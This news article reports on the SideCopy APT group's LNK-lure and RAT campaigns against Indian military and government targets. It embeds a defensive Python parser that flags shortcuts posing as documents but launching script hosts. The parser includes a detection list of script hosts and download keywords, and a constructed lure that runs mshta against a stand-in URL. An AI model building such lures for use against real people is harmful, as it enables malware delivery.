
SideCopy expands hacking ops to target Indian govt officials

The APT group known as SideCopy has added new remote access trojans (RATs) to its arsenal, and Cisco Talos observed an expansion in activity of the group's malware campaigns targeting entities in India. (Photo: Reuters)

Once a machine is infected, SideCopy deploys tools such as keyloggers and file enumerators to steal data from the victim. Its credential-stealing components target web browsers such as Chrome and Opera, and apps such as CCleaner. The malware is delivered through fake websites or through legitimate websites the attackers have compromised.

NEW DELHI: An advanced persistent threat (APT) group that predominantly targets Indian Army personnel has increased its activity this year.

The group, first documented by antivirus maker Quick Heal in 2020, has expanded its operations and its arsenal of infection techniques, targeting government officials and the Kavach application built by the National Informatics Centre (NIC) to secure access to government email accounts.

The APT group known as SideCopy has added new remote access trojans (RATs) to its arsenal, according to the threat intelligence group Cisco Talos. Talos observed an “expansion in activity” of the group’s malware campaigns targeting entities in India. APT groups are usually state-backed hacking groups that target other countries’ infrastructure and national-security institutions.

“SideCopy uses themes designed to target military personnel in the Indian subcontinent. Many of the LNK files (Windows shortcut files; attackers favour them as a first stage because a shortcut can carry a document-like name and icon while launching an arbitrary command when double-clicked) and decoy documents used in their attacks pose as internal, operational documents of the Indian Army,” the research said. The attackers have a “special interest” in victims from India and Pakistan.
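The passage above describes the core trick of an LNK lure: a shortcut that looks like a document but whose target is a command interpreter. The following parser, an added example written for this article and not code from Cisco Talos or from any SideCopy sample, reads a shortcut according to the public MS-SHLLINK layout (LinkInfo LocalBasePath plus the StringData name, arguments and icon fields) and flags the document-name-on-a-script-host mismatch. The `build_lnk` helper, the file names, the `example.invalid` URL and the `SCRIPT_HOSTS` list are constructed for the demonstration; real lures usually also carry a LinkTargetIDList, which the parser skips.

```python
"""Parse Windows .LNK shortcuts and flag ones that pose as documents but run a
script host. Layout follows MS-SHLLINK. Example code written for this article,
not taken from Cisco Talos or from any SideCopy sample."""
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046").bytes_le
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80

# Hypothetical watch list: binaries a "document" should never resolve to.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "hh.exe"}
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx")


def _cstr(buf, off):
    """Null-terminated ANSI string starting at off."""
    end = buf.index(b"\x00", off)
    return buf[off:end].decode("cp1252", "replace")


def _string_data(buf, off, unicode_):
    """One StringData item: uint16 character count, then the characters."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    if unicode_:
        return buf[off:off + 2 * count].decode("utf-16-le"), off + 2 * count
    return buf[off:off + count].decode("cp1252", "replace"), off + count


def parse_lnk(buf):
    """Return target path, display name, arguments and icon of a shortcut."""
    if len(buf) < 0x4C or struct.unpack_from("<I", buf, 0)[0] != 0x4C:
        raise ValueError("not a shell link: bad HeaderSize")
    if buf[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    (flags,) = struct.unpack_from("<I", buf, 20)
    off = 0x4C
    if flags & HAS_ID_LIST:  # LinkTargetIDList: uint16 size then the items
        (id_list_size,) = struct.unpack_from("<H", buf, off)
        off += 2 + id_list_size
    info = {"target": "", "name": "", "relative_path": "", "working_dir": "",
            "arguments": "", "icon": ""}
    if flags & HAS_LINK_INFO:
        start = off
        size, _hdr, li_flags, _vol, base_off, _net, suffix_off = \
            struct.unpack_from("<7I", buf, start)
        if li_flags & 0x1:  # VolumeIDAndLocalBasePath
            info["target"] = _cstr(buf, start + base_off) + _cstr(buf, start + suffix_off)
        off = start + size
    unicode_ = bool(flags & IS_UNICODE)
    for bit, key in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                     (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                     (HAS_ICON, "icon")):
        if flags & bit:  # StringData items appear in this fixed order
            info[key], off = _string_data(buf, off, unicode_)
    return info


def triage_lnk(buf):
    """Flag a shortcut whose name/icon says 'document' but whose target is a script host."""
    info = parse_lnk(buf)
    target = (info["target"] or info["relative_path"]).replace("/", "\\")
    exe = target.rsplit("\\", 1)[-1].lower()
    icon = info["icon"].lower()
    looks_like_doc = (info["name"].lower().endswith(DOC_EXTS) or icon.endswith(DOC_EXTS)
                      or any(w in icon for w in ("acrord", "winword", "excel")))
    reasons = []
    if exe in SCRIPT_HOSTS:
        reasons.append(f"target is script host {exe}")
        if looks_like_doc:
            reasons.append("document-themed name/icon on a script-host shortcut")
    args = info["arguments"].lower()
    for kw in ("http://", "https://", "downloadstring", "-enc ", "mshta", "hh.exe"):
        if kw in args:
            reasons.append(f"arguments contain {kw!r}")
    return {"info": info, "suspicious": bool(reasons), "reasons": reasons}


def build_lnk(target, name="", args="", icon=""):
    """Build a minimal shortcut (LinkInfo + Unicode StringData) as offline test
    input. The VolumeID is omitted: Explorer would want one, the parser does not."""
    base = target.encode("cp1252") + b"\x00"
    base_off = 0x1C                      # LocalBasePath right after the LinkInfo header
    suffix_off = base_off + len(base)    # empty CommonPathSuffix
    link_info = struct.pack("<7I", suffix_off + 1, 0x1C, 0x1, 0, base_off, 0,
                            suffix_off) + base + b"\x00"
    flags, string_data = HAS_LINK_INFO | IS_UNICODE, b""
    for bit, s in ((HAS_NAME, name), (HAS_ARGS, args), (HAS_ICON, icon)):
        if s:
            flags |= bit
            string_data += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags) + b"\x00" * 52
    return header + link_info + string_data + struct.pack("<I", 0)  # TerminalBlock


# Constructed samples, not real SideCopy artifacts: a lure posing as an Army
# document that actually runs mshta, and a benign shortcut to a real PDF.
LURE = build_lnk(r"C:\Windows\System32\mshta.exe", name="Seniority_List_2021.pdf",
                 args="https://example.invalid/seniority.hta",
                 icon=r"C:\Program Files\Adobe\Acrobat\AcroRd32.exe")
BENIGN = build_lnk(r"C:\Users\user\Documents\Seniority_List_2021.pdf",
                   name="Seniority_List_2021.pdf")

if __name__ == "__main__":
    for label, sample in (("lure", LURE), ("benign", BENIGN)):
        print(label, triage_lnk(sample)["reasons"])
```

To run it over a directory of suspicious shortcuts, feed `open(path, "rb").read()` to `triage_lnk`; the `ValueError` checks stop it from misreading files that merely carry a `.lnk` extension.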

The tactics used by the group are similar to another APT group called Transparent Tribe, whose existence has been traced to as far back as 2013 by various security firms. Proofpoint, a security firm, had found malicious emails sent to Indian embassies in Saudi Arabia and Kazakhstan in 2016.

“More recently in 2021, we have seen an increase in attempts to infect their victims. Their proliferation is also evident from the fact that we’ve discovered RATs and malicious plug-ins now being used by SideCopy," Asheer Malhotra, a research engineer at Talos, said.

The attackers used multiple government and policy documents from related institutions as decoys. Talos found decoy documents imitating research papers from the Centre for Joint Warfare Studies and one posing as an advertisement of a call for proposals for the Chair of Excellence 2021 at the Centre for Land Warfare Studies (CLAWS). The group also uses job openings at Indian think tanks as lures. One lure, seen as recently as 2021, posed as an Indian Army seniority list.

“The presence of a variety of decoy documents and file names pertaining to military, diplomatic and government-based think tanks indicates a specific targeting of these entities," Malhotra said.
